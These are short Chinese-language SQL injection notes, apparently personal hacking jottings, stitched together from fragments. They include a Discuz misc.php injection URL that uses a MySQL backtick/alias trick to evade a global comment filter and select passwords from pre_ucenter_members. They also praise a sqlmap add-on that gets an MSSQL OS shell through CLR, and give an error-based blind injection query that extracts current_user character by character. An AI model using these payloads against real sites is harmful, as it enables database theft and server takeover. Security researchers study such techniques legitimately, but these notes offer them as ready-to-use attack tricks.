很多时候可能会出现这样一个问题,对方的代码存在全局过滤#
--
(也就是防止你注释) 但在MYSQL中有一个别名特性,他会自动闭合另外一个反引号,因此可以这样用:http://localhost/bbs/misc.php?mod=stat&op=trend&xml=1&merge=1&types[1]=password`as statistic from pre_common_statuser,pre_ucenter_members as
P牛在绕过DZ的全局SQL防注入的时候就使用了这个操作。
这个工具看着挺牛逼的,因为他加强了SQLMAP对于MSSQL注入的相关操作。原有的--os-shell 依赖于xp_cmdshell
,但现在用这个可以直接clr,非常牛逼
例如第一个字符是r
114,那么:select * from student s where id=1 and 1=~113+ascii(substring(current_user,1,1))
而:select * from student s where id=1 and 1=~114+ascii(substring(current_user,1,1))
不报错,并且之后>114的也不会报错,因此第一位就是114